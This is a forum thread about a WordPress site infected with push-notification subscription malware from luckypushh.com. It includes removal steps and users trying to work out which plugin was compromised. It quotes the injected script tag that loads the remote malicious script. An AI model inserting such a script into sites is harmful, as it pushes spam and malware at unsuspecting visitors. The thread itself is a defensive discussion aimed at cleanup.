menu search
brightness_auto
more_vert

I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware

thumb_up_off_alt 0 like thumb_down_off_alt 0 dislike

1 Answer

more_vert
 
done_all
Best answer

I was contacted by a friend who said that a Pop-up box started appearing , just like the one which asks for browser notification permission on examining the box it turned out to be malware pushing subscribes for a website Luckypushh . com

At time of writing of writing I couldn't pin point the exact Plugin which injected it , but as the last two updated apps where All In One SEO and Sucuri Defender so strongest chances are of these two plugins.

The following code was injected on the blog

<script src="//luckypushh.com/ntfc.php?p=xxx" data-cfasync="false" async=""></script>

A google search didn't show much about luckypushh.com just that the domain was registered on 30 March 2018. There are 125 indexed searches on google with the same injected code put a different parameter number.

Once clicking the "Allow" in fake notification subscriber, It opens up a pop-up box , which prompts an actual browser notifications for the website "Luckypushh.com" 

How to Remove LuckyPussh Notification Subscribe Malware

Open your WordPress Dashboard and go to Appearance > Editor , select "header" file and remove the Script tags highlighted at Line 8

Any information on the actual culprit would be highly appreciated so that I may add to it and remove the bloody plugin for good

thumb_up_off_alt 0 like thumb_down_off_alt 0 dislike
more_vert
I've had the same problem. I didn't find the LuckyPussh code in the header so restored a backup of the site. I'm not using either of the plugins you mentioned, maybe we could compare plugins and see if we have any in common? My site is using the GeneratePress  theme with the free version of Elementor.
more_vert
Were you by any chance using Easy Facebook Likebox? I suspect it might be the culprit.
more_vert
Can you link to a recent plugin update and this issue appearing ?

We can ,you can email me your plugin list ..I'll email you the plugin list of the above mentioned blog .

No the blog doesn't have easy Facebook likebox ...

This makes it weird
Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking, Technology, Gaming, Programming, Blockchain and everything to get you going with your Cyber World.

222 questions

227 answers

401 comments

737,010 users

...